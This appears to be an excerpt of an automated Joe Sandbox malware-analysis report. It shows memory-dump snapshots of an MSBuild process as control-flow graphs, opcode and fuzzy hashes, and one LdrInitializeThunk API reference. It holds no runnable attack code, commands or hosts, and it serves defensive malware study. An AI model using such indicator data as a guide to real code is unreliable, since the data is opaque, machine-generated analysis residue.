                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b016a9b2e8e30d9b5683eae73657ce65426acc597c1ab236b5eee6e3a88990ae
                                                                                                                • Instruction ID: 6e666be089aea57a8995b4381844c155cc9b5a58cc2ab3961b5689a53b8f03ea
                                                                                                                • Opcode Fuzzy Hash: b016a9b2e8e30d9b5683eae73657ce65426acc597c1ab236b5eee6e3a88990ae
                                                                                                                • Instruction Fuzzy Hash: 5B51C474E01218DFDB18DFAAD894A9DBBB2BF89300F249029E819AB365DB345D41CF14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05935ae08ef3a45a6b4a81e6eac863387bf079763069ddab88adfac45fbb1b88
                                                                                                                • Instruction ID: 065526d5935c2272bab83efcc90b21387bedc62f2051248ccba6fdee2cf3a0d6
                                                                                                                • Opcode Fuzzy Hash: 05935ae08ef3a45a6b4a81e6eac863387bf079763069ddab88adfac45fbb1b88
                                                                                                                • Instruction Fuzzy Hash: A651F470D11228CFDB14EFA8E885BAEB7B1FB49314F248139E015AB294C7759D89EF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 549 f21a79-f21aa0 551 f21aa2 549->551 552 f21aa7-f21b2b 549->552 551->552 559 f21b47-f21b7f 552->559 560 f21b2d-f21b42 call f2079c * 2 552->560 567 f21b81-f21b96 call f207ac * 2 559->567 568 f21b9b-f21bab 559->568 560->559 567->568
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PG$PG$PG
                                                                                                                • API String ID: 0-4102702343
                                                                                                                • Opcode ID: be9b7706e86f809435bed899f74c2f94f120660b078c057926a1350c8497056c
                                                                                                                • Instruction ID: c7b10f9a1f38dd0fe3f05fa2d3360c084dc2a4fef559bc2642c08487c496493c
                                                                                                                • Opcode Fuzzy Hash: be9b7706e86f809435bed899f74c2f94f120660b078c057926a1350c8497056c
                                                                                                                • Instruction Fuzzy Hash: 96315E74E01259DFCB04EFB4D8516AEBBB2FF85300F108969D415AB385DB38AA05DF91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1151 65b992c 1152 65b99eb-65b99fc 1151->1152 1153 65b99fe 1152->1153 1154 65b9a03-65b9a0c 1152->1154 1153->1154 1156 65b97e3-65b9808 1154->1156 1157 65b9a12-65b9a25 1154->1157 1160 65b980a 1156->1160 1161 65b980f-65b9846 1156->1161 1158 65b9a2c-65b9a47 1157->1158 1159 65b9a27 1157->1159 1162 65b9a49 1158->1162 1163 65b9a4e-65b9a62 1158->1163 1159->1158 1160->1161 1169 65b9848 1161->1169 1170 65b984d-65b987f 1161->1170 1162->1163 1167 65b9a69-65b9a7f LdrInitializeThunk 1163->1167 1168 65b9a64 1163->1168 1171 65b9a81-65b9b7e 1167->1171 1168->1167 1169->1170 1176 65b98e3-65b98f6 1170->1176 1177 65b9881-65b98a6 1170->1177 1173 65b9b80-65b9b85 1171->1173 1174 65b9b86-65b9b90 1171->1174 1173->1174 1178 65b98f8 1176->1178 1179 65b98fd-65b9922 1176->1179 1181 65b98a8 1177->1181 1182 65b98ad-65b98db 1177->1182 1178->1179 1185 65b9931-65b9969 1179->1185 1186 65b9924-65b9925 1179->1186 1181->1182 1182->1176 1187 65b996b 1185->1187 1188 65b9970-65b99d1 call 65b9328 1185->1188 1186->1157 1187->1188 1194 65b99d8-65b99ea 1188->1194 1195 65b99d3 1188->1195 1194->1152 1195->1194
                                                                                                                APIs
                                                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 065B9A6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4778360792.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_65b0000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7532110925fa5403dc534e33e7917fb47ad5dc3a8e7c08c7c0859c823f00311a
                                                                                                                • Instruction ID: cb9473bc764e490bb35111f7bcef7db20295cf64ba038dcf7358ab9938d9f556
                                                                                                                • Opcode Fuzzy Hash: 7532110925fa5403dc534e33e7917fb47ad5dc3a8e7c08c7c0859c823f00311a
                                                                                                                • Instruction Fuzzy Hash: E3116A74E002099FEB44DFE8C884AEDBBB5FF89314F149129E948A7241D7309941CF60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1712 f28490-f2897e 1787 f28ed0-f28f05 1712->1787 1788 f28984-f28994 1712->1788 1793 f28f11-f28f2f 1787->1793 1794 f28f07-f28f0c 1787->1794 1788->1787 1789 f2899a-f289aa 1788->1789 1789->1787 1790 f289b0-f289c0 1789->1790 1790->1787 1792 f289c6-f289d6 1790->1792 1792->1787 1795 f289dc-f289ec 1792->1795 1805 f28f31-f28f3b 1793->1805 1806 f28fa6-f28fb2 1793->1806 1796 f28ff6-f28ffb 1794->1796 1795->1787 1797 f289f2-f28a02 1795->1797 1797->1787 1799 f28a08-f28a18 1797->1799 1799->1787 1801 f28a1e-f28a2e 1799->1801 1801->1787 1802 f28a34-f28a44 1801->1802 1802->1787 1804 f28a4a-f28a5a 1802->1804 1804->1787 1807 f28a60-f28ecf 1804->1807 1805->1806 1811 f28f3d-f28f49 1805->1811 1812 f28fb4-f28fc0 1806->1812 1813 f28fc9-f28fd5 1806->1813 1820 f28f4b-f28f56 1811->1820 1821 f28f6e-f28f71 1811->1821 1812->1813 1823 f28fc2-f28fc7 1812->1823 1818 f28fd7-f28fe3 1813->1818 1819 f28fec-f28fee 1813->1819 1818->1819 1832 f28fe5-f28fea 1818->1832 1819->1796 1820->1821 1834 f28f58-f28f62 1820->1834 1824 f28f73-f28f7f 1821->1824 1825 f28f88-f28f94 1821->1825 1823->1796 1824->1825 1836 f28f81-f28f86 1824->1836 1828 f28f96-f28f9d 1825->1828 1829 f28ffc-f2901e 1825->1829 1828->1829 1833 f28f9f-f28fa4 1828->1833 1838 f29020 1829->1838 1839 f2902e 1829->1839 1832->1796 1833->1796 1834->1821 1841 f28f64-f28f69 1834->1841 1836->1796 1838->1839 1843 f29027-f2902c 1838->1843 1844 f29030-f29031 1839->1844 1841->1796 1843->1844
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7c6122a0a565705ebd8d370df4b3b233228a665464593c5684d19eecae513cc
                                                                                                                • Instruction ID: 648710bae3b7eb1793e1d45e4a096fef0841cb11e8699197dce6e7799f7ded17
                                                                                                                • Opcode Fuzzy Hash: d7c6122a0a565705ebd8d370df4b3b233228a665464593c5684d19eecae513cc
                                                                                                                • Instruction Fuzzy Hash: A5521D30A0021DCFEB14ABB4D850BAEBB76FF94300F1080A9D149AB7A5DB755E45DFA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 73d9efb5cd6bd9c20d379d2a3ae8a2df4d94ea2902a07a7c6b568ef0ea6fe17e
                                                                                                                • Instruction ID: 42aedd42f9135c51f03cadffba7e4f8b6f68012712de3357bc245f69aa693d78
                                                                                                                • Opcode Fuzzy Hash: 73d9efb5cd6bd9c20d379d2a3ae8a2df4d94ea2902a07a7c6b568ef0ea6fe17e
                                                                                                                • Instruction Fuzzy Hash: B312983A03524ADFD6406F70FABC06ABF60FF5F3673056D21E02BC5165AFB50449AA22

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2242 f2e018-f2e022 2243 f2e024 2242->2243 2244 f2e029-f2e092 call f2e8e8 2242->2244 2243->2244 2567 f2e093 call f2f2c0 2244->2567 2568 f2e093 call f2f4ac 2244->2568 2260 f2e099-f2e0a7 call f2f71f 2570 f2e0a8 call 65b0c01 2260->2570 2571 f2e0a8 call 65b0b30 2260->2571 2572 f2e0a8 call 65b0b20 2260->2572 2263 f2e0ae 2573 f2e0af call 65b178f 2263->2573 2574 f2e0af call 65b17a0 2263->2574 2264 f2e0b5 2575 f2e0b6 call 65b1e70 2264->2575 2576 f2e0b6 call 65b1e80 2264->2576 2265 f2e0bc 2577 f2e0bd call 65b295b 2265->2577 2578 f2e0bd call 65b2968 2265->2578 2266 f2e0c3-f2e0e6 2579 f2e0e7 call 65be24a 2266->2579 2580 f2e0e7 call 65be258 2266->2580 2272 f2e0ed-f2e618 2564 f2e619 call 65bfc68 2272->2564 2565 f2e619 call 65bfc5e 2272->2565 2462 f2e61f-f2e8db 2563 f2e8e2-f2e8e5 2462->2563 2564->2462 2565->2462 2567->2260 2568->2260 2570->2263 2571->2263 2572->2263 2573->2264 2574->2264 2575->2265 2576->2265 2577->2266 2578->2266 2579->2272 2580->2272
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 66c37a9d8997802d8fd4c66fce4c501670ade6dbd1402ec425d7e3fd023728fa
                                                                                                                • Instruction ID: 6393d69cdccebc3e8a012f220a55fbed07d02e3041a7f4fa968cc0a2dbf23300
                                                                                                                • Opcode Fuzzy Hash: 66c37a9d8997802d8fd4c66fce4c501670ade6dbd1402ec425d7e3fd023728fa
                                                                                                                • Instruction Fuzzy Hash: 1E12883A03124ADFE6406F70FABC16ABB60FF5F3673056D21E02BC5165AFB50459AA21

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2581 f20c8f-f20cc0 2583 f20cc2 2581->2583 2584 f20cc7-f20cdd call f20780 2581->2584 2583->2584 2587 f20ce2 2584->2587 2588 f20cee-f20d55 call f20780 * 3 2587->2588 2599 f20d5a-f20d60 call f21a79 2588->2599 2600 f20d66-f2104e call f20780 * 10 2599->2600 2662 f21056-f2107d call f227f0 2600->2662 2762 f21080 call f23cc0 2662->2762 2763 f21080 call f23a99 2662->2763 2665 f21086-f2108f 2764 f21092 call f241a0 2665->2764 2765 f21092 call f23e09 2665->2765 2666 f21098-f210c2 2669 f210cb-f210ce call f25370 2666->2669 2670 f210d4-f210fe 2669->2670 2673 f21107-f2110a call f2c147 2670->2673 2674 f21110-f2113a 2673->2674 2677 f21143-f21146 call f2c468 2674->2677 2678 f2114c-f21176 2677->2678 2681 f2117f-f21182 call f2c738 2678->2681 2682 f21188-f211b2 2681->2682 2685 f211bb-f211be call f2ca08 2682->2685 2686 f211c4-f211f7 2685->2686 2689 f21203-f21209 call f2ccd8 2686->2689 2690 f2120f-f2124b 2689->2690 2693 f21257-f2125d call f2cfaa 2690->2693 2694 f21263-f2129f 2693->2694 2697 f212ab-f212b1 call f2d278 2694->2697 2698 f212b7-f213d2 2697->2698 2711 f213de-f213f0 call f25370 2698->2711 2712 f213f6-f2145c 2711->2712 2717 f21467-f21473 call f2d548 2712->2717 2718 f21479-f21485 2717->2718 2719 f21490-f2149c call f2d548 2718->2719 2720 f214a2-f214ae 2719->2720 2721 f214b9-f214c5 call f2d548 2720->2721 2722 f214cb-f214d7 2721->2722 2723 f214e2-f214ee call f2d548 2722->2723 2724 f214f4-f21500 2723->2724 2725 f2150b-f21517 call f2d548 2724->2725 2726 f2151d-f21529 2725->2726 2727 f21534-f21540 call f2d548 2726->2727 2728 f21546-f21552 2727->2728 2729 f2155d-f21569 call f2d548 2728->2729 2730 f2156f-f2158c 2729->2730 2732 f21597-f215a3 call f2d548 2730->2732 2733 f215a9-f215b5 2732->2733 2734 f215c0-f215cc call f2d548 2733->2734 2735 f215d2-f215de 2734->2735 2736 f215e9-f215f5 call f2d548 2735->2736 2737 f215fb-f21607 2736->2737 2738 f21612-f2161e call f2d548 2737->2738 2739 f21624-f21630 2738->2739 2740 f2163b-f21647 call f2d548 2739->2740 2741 f2164d-f21659 2740->2741 2742 f21664-f21670 call f2d548 2741->2742 2743 f21676-f21682 2742->2743 2744 f2168d-f21699 call f2d548 2743->2744 2745 f2169f-f216ab 2744->2745 2746 f216b6-f216c2 call f2d548 2745->2746 2747 f216c8-f216d4 2746->2747 2748 f216df-f216eb call f2d548 2747->2748 2749 f216f1-f217aa 2748->2749 2762->2665 2763->2665 2764->2666 2765->2666
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b7af843365e7236e0cb92dc024a049ae71cf639e45835be5cee2ee16f97dd851
                                                                                                                • Instruction ID: 19434201c1040b89b52a287253d5e206f913f6fe16d26819b62456a72a27915a
                                                                                                                • Opcode Fuzzy Hash: b7af843365e7236e0cb92dc024a049ae71cf639e45835be5cee2ee16f97dd851
                                                                                                                • Instruction Fuzzy Hash: 4C52E77491021ACFDB64EF24ED98B9DBBB2FB58300F0086A9D409A7365DB706E85DF50

                                                                                                                Control-flow Graph

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fca8b88b01c822d2bee29776d0fcd85a67722a29480e98a0de03080f42ecab09
                                                                                                                • Instruction ID: 87aa390ebe782ba139e61c6b263be3d4d394196f5d8171b97ebb72592324d16b
                                                                                                                • Opcode Fuzzy Hash: fca8b88b01c822d2bee29776d0fcd85a67722a29480e98a0de03080f42ecab09
                                                                                                                • Instruction Fuzzy Hash: 9752E77491021ACFCB64EF24ED98B9DBBB2FB58300F0086A9D409A7365DB706E85DF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3253 f276f1-f27725 3254 f27b54-f27b58 3253->3254 3255 f2772b-f2774e 3253->3255 3256 f27b71-f27b7f 3254->3256 3257 f27b5a-f27b6e 3254->3257 3264 f27754-f27761 3255->3264 3265 f277fc-f27800 3255->3265 3261 f27bf0-f27c05 3256->3261 3262 f27b81-f27b96 3256->3262 3271 f27c07-f27c0a 3261->3271 3272 f27c0c-f27c19 3261->3272 3273 f27b98-f27b9b 3262->3273 3274 f27b9d-f27baa 3262->3274 3277 f27763-f2776e 3264->3277 3278 f27770 3264->3278 3268 f27802-f27810 3265->3268 3269 f27848-f27851 3265->3269 3268->3269 3289 f27812-f2782d 3268->3289 3275 f27c67 3269->3275 3276 f27857-f27861 3269->3276 3279 f27c1b-f27c56 3271->3279 3272->3279 3280 f27bac-f27bed 3273->3280 3274->3280 3283 f27c6c-f27c9c 3275->3283 3276->3254 3281 f27867-f27870 3276->3281 3284 f27772-f27774 3277->3284 3278->3284 3327 f27c5d-f27c64 3279->3327 3287 f27872-f27877 3281->3287 3288 f2787f-f2788b 3281->3288 3310 f27cb5-f27cbc 3283->3310 3311 f27c9e-f27cb4 3283->3311 3284->3265 3291 f2777a-f277dc 3284->3291 3287->3288 3288->3283 3294 f27891-f27897 3288->3294 3308 f2783b 3289->3308 3309 f2782f-f27839 3289->3309 3339 f277e2-f277f9 3291->3339 3340 f277de 3291->3340 3296 f27b3e-f27b42 3294->3296 3297 f2789d-f278ad 3294->3297 3296->3275 3300 f27b48-f27b4e 3296->3300 3306 f278c1-f278c3 3297->3306 3307 f278af-f278bf 3297->3307 3300->3254 3300->3281 3315 f278c6-f278cc 3306->3315 3307->3315 3316 f2783d-f2783f 3308->3316 3309->3316 3315->3296 3319 f278d2-f278e1 3315->3319 3316->3269 3320 f27841 3316->3320 3325 f278e7 3319->3325 3326 f2798f-f279ba call f27538 * 2 3319->3326 3320->3269 3329 f278ea-f278fb 3325->3329 3343 f279c0-f279c4 3326->3343 3344 f27aa4-f27abe 3326->3344 3329->3283 3332 f27901-f27913 3329->3332 3332->3283 3335 f27919-f27931 3332->3335 3397 f27933 call f280d8 3335->3397 3398 f27933 call f280c9 3335->3398 3338 f27939-f27949 3338->3296 3342 f2794f-f27952 3338->3342 3339->3265 3340->3339 3345 f27954-f2795a 3342->3345 3346 f2795c-f2795f 3342->3346 3343->3296 3348 f279ca-f279ce 3343->3348 3344->3254 3370 f27ac4-f27ac8 3344->3370 3345->3346 3349 f27965-f27968 3345->3349 3346->3275 3346->3349 3353 f279d0-f279dd 3348->3353 3354 f279f6-f279fc 3348->3354 3350 f27970-f27973 3349->3350 3351 f2796a-f2796e 3349->3351 3350->3275 3355 f27979-f2797d 3350->3355 3351->3350 3351->3355 3366 f279df-f279ea 3353->3366 3367 f279ec 3353->3367 3356 f27a37-f27a3d 3354->3356 3357 f279fe-f27a02 3354->3357 3355->3275 3358 f27983-f27989 3355->3358 3360 f27a49-f27a4f 3356->3360 3361 f27a3f-f27a43 3356->3361 3357->3356 3359 f27a04-f27a0d 3357->3359 3358->3326 3358->3329 3368 f27a0f-f27a14 3359->3368 3369 f27a1c-f27a32 3359->3369 3364 f27a51-f27a55 3360->3364 3365 f27a5b-f27a5d 3360->3365 3361->3327 3361->3360 3364->3296 3364->3365 3373 f27a92-f27a94 3365->3373 3374 f27a5f-f27a68 3365->3374 3375 f279ee-f279f0 3366->3375 3367->3375 3368->3369 3369->3296 3371 f27b04-f27b08 3370->3371 3372 f27aca-f27ad4 call f263e0 3370->3372 3371->3327 3382 f27b0e-f27b12 3371->3382 3372->3371 3385 f27ad6-f27aeb 3372->3385 3373->3296 3380 f27a9a-f27aa1 3373->3380 3378 f27a77-f27a8d 3374->3378 3379 f27a6a-f27a6f 3374->3379 3375->3296 3375->3354 3378->3296 3379->3378 3382->3327 3384 f27b18-f27b25 3382->3384 3388 f27b27-f27b32 3384->3388 3389 f27b34 3384->3389 3385->3371 3394 f27aed-f27b02 3385->3394 3391 f27b36-f27b38 3388->3391 3389->3391 3391->3296 3391->3327 3394->3254 3394->3371 3397->3338 3398->3338
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 78b23518f2a2f7c3444defa1ee244ef34d0afbf2e49ae51f509c61836c3aec7d
                                                                                                                • Instruction ID: ad1d751f287d5d01b9bca475919539a8a6f4daf0fcd33180dc90157a347dfde7
                                                                                                                • Opcode Fuzzy Hash: 78b23518f2a2f7c3444defa1ee244ef34d0afbf2e49ae51f509c61836c3aec7d
                                                                                                                • Instruction Fuzzy Hash: 79125B30A04259DFCB15EF69E894AAEBBF1FF88320F148569E449DB261D730ED41DB50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3772 f25f38-f25f5a 3773 f25f70-f25f7b 3772->3773 3774 f25f5c-f25f60 3772->3774 3777 f26023-f2604f 3773->3777 3778 f25f81-f25f83 3773->3778 3775 f25f62-f25f6e 3774->3775 3776 f25f88-f25f8f 3774->3776 3775->3773 3775->3776 3780 f25f91-f25f98 3776->3780 3781 f25faf-f25fb8 3776->3781 3784 f26056-f260ae 3777->3784 3779 f2601b-f26020 3778->3779 3780->3781 3782 f25f9a-f25fa5 3780->3782 3876 f25fba call f25f2a 3781->3876 3877 f25fba call f25f38 3781->3877 3782->3784 3785 f25fab-f25fad 3782->3785 3804 f260b0-f260b6 3784->3804 3805 f260bd-f260cf 3784->3805 3785->3779 3786 f25fc0-f25fc2 3787 f25fc4-f25fc8 3786->3787 3788 f25fca-f25fd2 3786->3788 3787->3788 3793 f25fe5-f26004 call f269a0 3787->3793 3790 f25fe1-f25fe3 3788->3790 3791 f25fd4-f25fd9 3788->3791 3790->3779 3791->3790 3798 f26006-f2600f 3793->3798 3799 f26019 3793->3799 3873 f26011 call f2afd7 3798->3873 3874 f26011 call f2af64 3798->3874 3875 f26011 call f2afad 3798->3875 3799->3779 3801 f26017 3801->3779 3804->3805 3807 f26163-f26165 3805->3807 3808 f260d5-f260d9 3805->3808 3879 f26167 call f262f0 3807->3879 3880 f26167 call f26300 3807->3880 3809 f260db-f260e7 3808->3809 3810 f260e9-f260f6 3808->3810 3818 f260f8-f26102 3809->3818 3810->3818 3811 f2616d-f26173 3812 f26175-f2617b 3811->3812 3813 f2617f-f26186 3811->3813 3816 f261e1-f26240 3812->3816 3817 f2617d 3812->3817 3832 f26247-f2626b 3816->3832 3817->3813 3821 f26104-f26113 3818->3821 3822 f2612f-f26133 3818->3822 3830 f26123-f2612d 3821->3830 3831 f26115-f2611c 3821->3831 3823 f26135-f2613b 3822->3823 3824 f2613f-f26143 3822->3824 3827 f26189-f261da 3823->3827 3828 f2613d 3823->3828 3824->3813 3829 f26145-f26149 3824->3829 3827->3816 3828->3813 3829->3832 3833 f2614f-f26161 3829->3833 3830->3822 3831->3830 3841 f26271-f26273 3832->3841 3842 f2626d-f2626f 3832->3842 3833->3813 3846 f26284-f26286 3841->3846 3847 f26275-f26279 3841->3847 3845 f262e9-f262ec 3842->3845 3848 f26288-f2628c 3846->3848 3849 f26299-f2629f 3846->3849 3851 f2627b-f2627d 3847->3851 3852 f2627f-f26282 3847->3852 3854 f26292-f26297 3848->3854 3855 f2628e-f26290 3848->3855 3856 f262a1-f262c8 3849->3856 3857 f262ca-f262cc 3849->3857 3851->3845 3852->3845 3854->3845 3855->3845 3859 f262d3-f262d5 3856->3859 3857->3859 3863 f262d7-f262d9 3859->3863 3864 f262db-f262dd 3859->3864 3863->3845 3865 f262e6 3864->3865 3866 f262df-f262e4 3864->3866 3865->3845 3866->3845 3873->3801 3874->3801 3875->3801 3876->3786 3877->3786 3879->3811 3880->3811
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2870e73430612ab76d9d2ceeeaa9d9d9adee925ee13fe549ca88001ec22a6570
                                                                                                                • Instruction ID: 039c7c1e1f3732b91c95f4fd6396717a6680e03e9bb9d8a53ae940e83eb5c197
                                                                                                                • Opcode Fuzzy Hash: 2870e73430612ab76d9d2ceeeaa9d9d9adee925ee13fe549ca88001ec22a6570
                                                                                                                • Instruction Fuzzy Hash: 58B1DF31B04225CFDB159F74E854B7A7BE2AF88720F148569E806CB3A1DB78DC41EB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8e27989704551413b5dbb242fe6197d4192288d7504874b042000358b02db5e
                                                                                                                • Instruction ID: 5de0ee7b4217c8445f989052c5904851d8e376116232b757a1d789dab76dff1f
                                                                                                                • Opcode Fuzzy Hash: d8e27989704551413b5dbb242fe6197d4192288d7504874b042000358b02db5e
                                                                                                                • Instruction Fuzzy Hash: 719127319087558FC711CF68E8849AABBB1FF85320F15C66AD859D7351D371ED12CBA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 26e9ac04cbc89938bdb26d67c34099921e204b6405652dcae39b37912d816b02
                                                                                                                • Instruction ID: 31b14652fb91aa8b9f682968b22f28cbb5eddbc35b1571aec58bb4a7c6cc310b
                                                                                                                • Opcode Fuzzy Hash: 26e9ac04cbc89938bdb26d67c34099921e204b6405652dcae39b37912d816b02
                                                                                                                • Instruction Fuzzy Hash: D5818E31E00525CFCB14DFA9E888A69BBB2FF89314F248169D405EB365DB31EC41EB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: be3e6155279b279ac7893f88a3b7dd400aa347cad4d2fb29b4c8291e764aa6b5
                                                                                                                • Instruction ID: 0d8cfa13b8fdbb4a55aea4c9698c700c0f0318d1e33cabf057228e6cb8b3e0eb
                                                                                                                • Opcode Fuzzy Hash: be3e6155279b279ac7893f88a3b7dd400aa347cad4d2fb29b4c8291e764aa6b5
                                                                                                                • Instruction Fuzzy Hash: BA717B34B01615CFCB14DF68D884A6E7BE5AF99790B1500A9E812DB3B1DF74DC42EB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 11f62035850e1eabdbeb63a2bbd81478b7103ae1a5f5926c7b25cea8e1168654
                                                                                                                • Instruction ID: 5df4307262779ab014fbbbdde46edd4d564fac90a1563de83edd472f0a158fab
                                                                                                                • Opcode Fuzzy Hash: 11f62035850e1eabdbeb63a2bbd81478b7103ae1a5f5926c7b25cea8e1168654
                                                                                                                • Instruction Fuzzy Hash: D4611234D11219EFEB14DFA5D898BADBBB2FF88300F208129D805AB395DB755A46CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22de740f71499632846aa31cef13ccf5602538149ed52c93c48dbb8b66cc5a8e
                                                                                                                • Instruction ID: 9abed514eacaed6a4e184a686d2640f45f56f34c234344a322005c4107ed6e38
                                                                                                                • Opcode Fuzzy Hash: 22de740f71499632846aa31cef13ccf5602538149ed52c93c48dbb8b66cc5a8e
                                                                                                                • Instruction Fuzzy Hash: EB51C131B042199FDB00DF68D850B7ABBE6EF88310F54842AE949CB355DBB5CC01EBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
